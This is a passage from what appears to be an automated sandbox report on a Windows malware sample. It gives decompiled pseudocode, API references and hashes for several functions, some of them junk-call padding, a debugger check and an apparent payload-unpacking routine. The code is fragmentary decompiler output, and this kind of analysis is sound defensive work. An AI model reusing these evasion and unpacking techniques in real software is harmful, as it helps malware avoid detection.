LoadLibraryA.KERNEL32(msimg32.dll,00000000), ref: 0040475E
GetProcAddress.KERNEL32(msimg32.dll,14CA3371), ref: 00404B7D
VirtualProtect.KERNELBASE(00000040,?), ref: 00404B9B

Strings

msimg32.dll, xrefs: 004046FD, 00404702, 00404B0D
mn@, xrefs: 00404814
V%7(, xrefs: 00404AC6
oQZ, xrefs: 00404AAC
0P%G, xrefs: 00404A15
%b5;, xrefs: 00404A32
IVE, xrefs: 00404989
Jb%, xrefs: 0040493F
Jo , xrefs: 00404922
kiu, xrefs: 004049DB

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressLibraryLoadProcProtectVirtual
String ID: %b5;$0P%G$IVE$Jb%$Jo $V%7($msimg32.dll$mn@$oQZ$kiu
API String ID: 3509694964-212567100
Opcode ID: 1b69801e2e1c47f8d01470eb3588a78a656ed7e9a00caf1172ac377a410d3b0b
Instruction ID: d3a44aa28ae360d6cecd3e3d3fe5fc0f95a76b358f466b33c7dbc3d46d96d836
Opcode Fuzzy Hash: 1b69801e2e1c47f8d01470eb3588a78a656ed7e9a00caf1172ac377a410d3b0b
Instruction Fuzzy Hash: C4B11074A0C380CFD310DF6AD48860ABBE0BBA5358F944A0CF5D55A621C3B9D989CF5B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D47E Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D47E() {
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t1;
				void* _t5;
				void* _t18;
				WCHAR* _t20;

				_t1 = GetEnvironmentStringsW();
				_t20 = _t1;
				if(_t20 != 0) {
					if( *_t20 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t1 =  &(_t1[1]);
							} while ( *_t1 != 0);
							_t1 =  &(_t1[1]);
						} while ( *_t1 != 0);
					}
					_t13 = _t1 - _t20 + 2;
					_t5 = E0041017A(_t1 - _t20 + 2); // executed
					_t18 = _t5;
					if(_t18 != 0) {
						E00407690(_t13, _t18, _t20, _t18, _t20, _t13);
					}
					FreeEnvironmentStringsW(_t20);
					return _t18;
				} else {
					return 0;
				}
			}

0x0040d481
0x0040d487
0x0040d48d
0x0040d496
0x00000000
0x0040d498
0x0040d498
0x0040d498
0x0040d499
0x0040d49a
0x0040d4a0
0x0040d4a1
0x0040d498
0x0040d4ab
0x0040d4af
0x0040d4b4
0x0040d4b9
0x0040d4cb
0x0040d4d0
0x0040d4bc
0x0040d4c7
0x0040d48f
0x0040d492
0x0040d492

APIs

GetEnvironmentStringsW.KERNEL32(00000000,004071AB), ref: 0040D481
__malloc_crt.LIBCMT ref: 0040D4AF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040D4BC

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: cbd088ef2baa2125fbfd1fa13128235225cfd181fc13ec8c056ab0adec94ce6d
Instruction ID: 669560d8cf408b1428bde3b8f18d8137bc47f832364722111ad980144f7813f7
Opcode Fuzzy Hash: cbd088ef2baa2125fbfd1fa13128235225cfd181fc13ec8c056ab0adec94ce6d
Instruction Fuzzy Hash: CDF0E237D141205ACA20BABA6C088BB1638DACB36A312453BF452E3280F5384D8782A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD36 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040AD36(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x5575bc = _t6;
				if(_t6 != 0) {
					 *0x55927c = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040ad4b
0x0040ad51
0x0040ad58
0x0040ad5f
0x0040ad65
0x0040ad5b
0x0040ad5b
0x0040ad5b

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040AD4B

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 92d4a89dd7e37ee4f013ba388895348d668f2b0bbf519285894f56519a2453ca
Instruction ID: 4fe2c631bc49707b8ce7c4e9bb779201910ead119c133f77b8b10fe0b68d7201
Opcode Fuzzy Hash: 92d4a89dd7e37ee4f013ba388895348d668f2b0bbf519285894f56519a2453ca
Instruction Fuzzy Hash: ACD05E36554308ABDB009F727C187623BDC9788796F008436F90DD62A0F574C550DE04

Uniqueness

Uniqueness Score: -1.00%

Function 004092BD Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004092BD() {
				void* _t1;

				_t1 = E0040924B(0); // executed
				return _t1;
			}

0x004092bf
0x004092c5

APIs

__encode_pointer.LIBCMT ref: 004092BF

Part of subcall function 0040924B: TlsGetValue.KERNEL32(00000000,?,004092C4,00000000,004110FD,00557758,00000000,00000314,?,0040CF86,00557758,Microsoft Visual C++ Runtime Library,00012010), ref: 0040925D
Part of subcall function 0040924B: TlsGetValue.KERNEL32(00000004,?,004092C4,00000000,004110FD,00557758,00000000,00000314,?,0040CF86,00557758,Microsoft Visual C++ Runtime Library,00012010), ref: 00409274
Part of subcall function 0040924B: RtlEncodePointer.NTDLL(00000000,?,004092C4,00000000,004110FD,00557758,00000000,00000314,?,0040CF86,00557758,Microsoft Visual C++ Runtime Library,00012010), ref: 004092B2

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 03079086d5dbb9922f8ff885f5a23f300fbcfe87dfb8603d1fe0f8ea03bf3111
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00404BA5 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404BA5() {
				void* _t1;

				_t1 = LocalAlloc(0,  *0x557154); // executed
				 *0x5565f8 = _t1;
				return _t1;
			}

0x00404bad
0x00404bb3
0x00404bb8

APIs

LocalAlloc.KERNELBASE(00000000,00404C26,0079A862,?,00000000), ref: 00404BAD

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 8c662341844706f53f20236e2f205bdcb457a82104d9898c3155c41e847c4d4d
Instruction ID: 4c57335655fffe214d177a2022449932e2f7d3870bf613eb870c8571680a2754
Opcode Fuzzy Hash: 8c662341844706f53f20236e2f205bdcb457a82104d9898c3155c41e847c4d4d
Instruction Fuzzy Hash: 92B012F4045341CBD7400F90BE58B007B30A318303F400061E91041274D7340088FF10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004045DF Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 103
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E004045DF(intOrPtr _a4) {
				void* _v6;
				struct _COORD _v8;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				void* _v44;
				struct _OVERLAPPED _v48;
				struct _INPUT_RECORD _v68;
				char _v132;
				char _v2180;
				intOrPtr _t19;
				intOrPtr _t42;
				void* _t45;
				void* _t49;

				if( *0x557154 == 0x37) {
					GetLocaleInfoW(0, 0, 0, 0);
					__imp__DebugActiveProcessStop(0, _t45, _t49);
					_v8.X = 0;
					asm("stosw");
					WriteConsoleOutputAttribute(0, 0, 0, _v8,  &_v20);
					__imp__FreeUserPhysicalPages(0,  &_v28, 0);
					GetProcessId(0);
					ReadConsoleInputA(0,  &_v68, 0,  &_v24);
					WaitForMultipleObjects(0, 0, 0, 0);
					LocalSize(0);
					CreateDirectoryExA(0, 0, 0);
					__imp__FindFirstVolumeMountPointW(0,  &_v2180, 0);
					_v48.Internal = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					WriteFile(0, 0, 0,  &_v12,  &_v48);
					ClearCommBreak(0);
					WriteConsoleInputA(0, 0, 0,  &_v16);
					__imp__FindActCtxSectionStringA(0, 0, 0, "kilemalikemirezedumijefomeyofunevelusafiwaxobasacuyayemexika",  &_v132);
					CreateFileA(0, 0, 0, 0, 0, 0, 0);
				}
				_t19 = _a4;
				_t42 =  *0x557568; // 0x416a1a
				_t17 = _t19 + 0x38d6; // 0x5afe5b06
				 *((char*)( *0x5565f8 + _t19)) =  *((intOrPtr*)(_t42 + _t17));
				return _t19;
			}

0x004045ef
0x004045fd
0x00404604
0x0040460c
0x00404613
0x0040461f
0x0040462b
0x00404632
0x00404642
0x0040464c
0x00404653
0x0040465c
0x0040466b
0x00404673
0x00404679
0x0040467a
0x0040467b
0x0040467c
0x00404688
0x0040468f
0x0040469c
0x004046ae
0x004046bb
0x004046c2
0x004046c3
0x004046c6
0x004046cc
0x004046d9
0x004046dd

APIs

GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004045FD
DebugActiveProcessStop.KERNEL32(00000000), ref: 00404604
WriteConsoleOutputAttribute.KERNEL32(00000000,00000000,00000000,?,?), ref: 0040461F
FreeUserPhysicalPages.KERNEL32(00000000,?,00000000), ref: 0040462B
GetProcessId.KERNEL32(00000000), ref: 00404632
ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00404642
WaitForMultipleObjects.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040464C
LocalSize.KERNEL32 ref: 00404653
CreateDirectoryExA.KERNEL32 ref: 0040465C
FindFirstVolumeMountPointW.KERNEL32(00000000,?,00000000), ref: 0040466B
WriteFile.KERNEL32(00000000,00000000,00000000,?,?), ref: 00404688
ClearCommBreak.KERNEL32(00000000), ref: 0040468F
WriteConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 0040469C
FindActCtxSectionStringA.KERNEL32(00000000,00000000,00000000,kilemalikemirezedumijefomeyofunevelusafiwaxobasacuyayemexika,?), ref: 004046AE
CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004046BB

Strings

kilemalikemirezedumijefomeyofunevelusafiwaxobasacuyayemexika, xrefs: 004046A6

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ConsoleWrite$CreateFileFindInputProcess$ActiveAttributeBreakClearCommDebugDirectoryFirstFreeInfoLocalLocaleMountMultipleObjectsOutputPagesPhysicalPointReadSectionSizeStopStringUserVolumeWait
String ID: kilemalikemirezedumijefomeyofunevelusafiwaxobasacuyayemexika
API String ID: 2979675291-2687294445
Opcode ID: 647baf5575dc9fce75978539462c2bdf85f2a723f01aa8d1a95db79e6ccd9f1c
Instruction ID: 15fc781cf69b3e6d03c53997b208b0251f99b9577e65a2ba4741d99fd6b10bd8
Opcode Fuzzy Hash: 647baf5575dc9fce75978539462c2bdf85f2a723f01aa8d1a95db79e6ccd9f1c
Instruction Fuzzy Hash: 2731D676402568BBD7219BA5EE0CCEF7F7CEE4A3A1B004061F649E1520D634568ACBF9

Uniqueness

Uniqueness Score: -1.00%

Function 0040730B Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040730B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x42c190; // 0xf0db39ac
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x557d88 = _t6;
				 *0x557d84 = _t22;
				 *0x557d80 = _t25;
				 *0x557d7c = _t21;
				 *0x557d78 = _t27;
				 *0x557d74 = _t26;
				 *0x557da0 = ss;
				 *0x557d94 = cs;
				 *0x557d70 = ds;
				 *0x557d6c = es;
				 *0x557d68 = fs;
				 *0x557d64 = gs;
				asm("pushfd");
				_pop( *0x557d98);
				 *0x557d8c =  *_t31;
				 *0x557d90 = _v0;
				 *0x557d9c =  &_a4;
				 *0x557cd8 = 0x10001;
				_t11 =  *0x557d90; // 0x0
				 *0x557c8c = _t11;
				 *0x557c80 = 0xc0000409;
				 *0x557c84 = 1;
				_t12 =  *0x42c190; // 0xf0db39ac
				_v812 = _t12;
				_t13 =  *0x42c194; // 0xf24c653
				_v808 = _t13;
				 *0x557cd0 = IsDebuggerPresent();
				_push(1);
				E00409243(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x40261c);
				if( *0x557cd0 == 0) {
					_push(1);
					E00409243(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040730b
0x0040730b
0x0040730b
0x0040730b
0x0040730b
0x0040730b
0x0040730b
0x00407311
0x00407313
0x00407313
0x0040d81c
0x0040d821
0x0040d827
0x0040d82d
0x0040d833
0x0040d839
0x0040d83f
0x0040d846
0x0040d84d
0x0040d854
0x0040d85b
0x0040d862
0x0040d869
0x0040d86a
0x0040d873
0x0040d87b
0x0040d883
0x0040d88e
0x0040d898
0x0040d89d
0x0040d8a2
0x0040d8ac
0x0040d8b6
0x0040d8bb
0x0040d8c1
0x0040d8c6
0x0040d8d2
0x0040d8d7
0x0040d8d9
0x0040d8e1
0x0040d8ec
0x0040d8f9
0x0040d8fb
0x0040d8fd
0x0040d902
0x0040d916

APIs

IsDebuggerPresent.KERNEL32 ref: 0040D8CC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D8E1
UnhandledExceptionFilter.KERNEL32(0040261C), ref: 0040D8EC
GetCurrentProcess.KERNEL32(C0000409), ref: 0040D908
TerminateProcess.KERNEL32(00000000), ref: 0040D90F

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 18b0bffd1f292d0248774a996b3f9fb8279f5c56cbca043ff5edd2f08e1bfd64
Instruction ID: c2be6b96099edb861a45c02c55917b5719ce01daba27f6e0b420ef6dadc24d4d
Opcode Fuzzy Hash: 18b0bffd1f292d0248774a996b3f9fb8279f5c56cbca043ff5edd2f08e1bfd64
Instruction Fuzzy Hash: 2121F0B48083089FD710DF24FD666683BB4BF6C306F4040AAE509973B1E7B05A89EF49

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAD1 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CAD1() {

				SetUnhandledExceptionFilter(E0040CA8F);
				return 0;
			}

0x0040cad6
0x0040cade

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000CA8F), ref: 0040CAD6

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2064de86c2562a69c35905e507b8897ae9c6421035c794b6e31e8baf579680d4
Instruction ID: 6ad921421b858842383045b2b961cbd4480141427b87717ea2e59f4549dde2fd
Opcode Fuzzy Hash: 2064de86c2562a69c35905e507b8897ae9c6421035c794b6e31e8baf579680d4
Instruction Fuzzy Hash: C99002B0B551558BC74557F05D4961525909A5C71375105716511E80A4DAB444445919

Uniqueness

Uniqueness Score: -1.00%

Function 004093B2 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E004093B2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x4182b8);
				E0040B9DC(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0040CADF(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x4025a0;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x42c690;
				E0040AEE2(_t35, 1, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E00409487();
				E0040AEE2(_t35, 1, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x42cc98; // 0x42cbc0
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E0040E519( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0040BA21(E00409490());
			}

0x004093b2
0x004093b2
0x004093b4
0x004093b9
0x004093be
0x004093c4
0x004093cc
0x004093cf
0x004093d4
0x004093d5
0x004093d8
0x004093db
0x004093e5
0x004093ea
0x004093f2
0x004093fa
0x0040940a
0x0040940a
0x00409410
0x00409413
0x0040941a
0x00409421
0x0040942a
0x00409430
0x00409437
0x0040943d
0x00409444
0x0040944b
0x00409451
0x00409454
0x00409457
0x0040945c
0x0040945e
0x00409463
0x00409463
0x00409469
0x0040946f
0x00409480

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,004182B8,0000000C,004094ED,00000000,00000000), ref: 004093C4
__crt_waiting_on_module_handle.LIBCMT ref: 004093CF

Part of subcall function 0040CADF: Sleep.KERNEL32(000003E8,00000000,?,00409315,KERNEL32.DLL,?,00409361), ref: 0040CAEB
Part of subcall function 0040CADF: GetModuleHandleW.KERNEL32(?,?,00409315,KERNEL32.DLL,?,00409361), ref: 0040CAF4

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004093F8
GetProcAddress.KERNEL32(?,DecodePointer), ref: 00409408
__lock.LIBCMT ref: 0040942A
InterlockedIncrement.KERNEL32(0042C690), ref: 00409437
__lock.LIBCMT ref: 0040944B
___addlocaleref.LIBCMT ref: 00409469

Strings

KERNEL32.DLL, xrefs: 004093BE, 004093C3, 004093CE
EncodePointer, xrefs: 004093EC
DecodePointer, xrefs: 00409400

Memory Dump Source

Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 6734308b148e91772b4aa3cb31740699c3cdeea8a5c48ff6adbc28f782fc9a19
Instruction ID: b444068550ae5543cd0b7152aaeb736dd30d8a757a68a49cc65ef58145a11f46
Opcode Fuzzy Hash: 6734308b148e91772b4aa3cb31740699c3cdeea8a5c48ff6adbc28f782fc9a19
Instruction Fuzzy Hash: F5116D70940700AED720DF6AD841B9ABBE4AF44318F10852FE499B22E1CBB899418B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00404F68 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80
timeCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404F68(void* __edx) {
				char _v32;
				struct _CRITICAL_SECTION _v56;
				short _v2104;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t13;
				intOrPtr _t17;
				void* _t38;
				void* _t48;
				void* _t49;
				void* _t50;

				_t47 = __edx;
				_t55 =  *0x557154 - 0x9e;
				if( *0x557154 == 0x9e) {
					_push(" %s %d %f");
					_push(0);
					E00407004(_t38, __edx, _t48, 0, _t55);
					E00406FC9(0);
					_push(0);
					E00406FF9();
					E00405DA5( &_v56, _t55);
					E00405A38( &_v32, _t48, "0");
					E0040629E( &_v56, __edx, _t55,  &_v32);
					E00405635();
					E00405A38( &_v32, _t48, "mufuvopuvaselaxeka");
					_push( &_v32);
					_push(0xa);
					E00406375( &_v56, _t47);
					E00405635();
					_push(0);
					E00406F3B(_t38, _t48, 0, _t55);
					E00406EFB( &_v32, 0, 0);
					E00406EE5(0);
					E00405FED( &_v56, 0, _t55);
				}
				_t49 = 0x2443831;
				do {
					_t13 =  *0x41a2e4; // 0xe2b2
					 *0x557154 = _t13;
					if(_t13 == 0xf) {
						SetCriticalSectionSpinCount( &_v56, 0);
					}
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				_t50 = 0x79a863;
				do {
					if( *0x557154 == 0x4c5) {
						GetTextFaceW(0, 0,  &_v2104);
						EnumTimeFormatsA(0, 0, 0);
					}
					_t50 = _t50 - 1;
				} while (_t50 != 0);
				_t17 =  *0x41a008; // 0x416a1a
				 *0x557568 = _t17;
				E00404BB9(_t47);
				return 0;
			}

0x00404f68
0x00404f74
0x00404f7f
0x00404f85
0x00404f8a
0x00404f8b
0x00404f91
0x00404f96
0x00404f97
0x00404fa2
0x00404faf
0x00404fbb
0x00404fc3
0x00404fd0
0x00404fd8
0x00404fd9
0x00404fde
0x00404fe6
0x00404feb
0x00404fec
0x00404ff3
0x00404ff9
0x00405004
0x00405004
0x00405009
0x0040500e
0x0040500e
0x00405013
0x0040501b
0x00405022
0x00405022
0x00405028
0x00405028
0x0040502b
0x00405030
0x0040503a
0x00405045
0x0040504e
0x0040504e
0x00405054
0x00405054
0x00405057
0x0040505c
0x00405061
0x0040506b

APIs

_printf.LIBCMT ref: 00404F8B

Part of subcall function 00406FC9: DeleteFileA.KERNEL32(?,?,00404F96,00000000,00000000, %s %d %f), ref: 00406FD1
Part of subcall function 00406FC9: GetLastError.KERNEL32(?,00404F96,00000000,00000000, %s %d %f), ref: 00406FDB
Part of subcall function 00406FC9: __dosmaperr.LIBCMT ref: 00406FEA

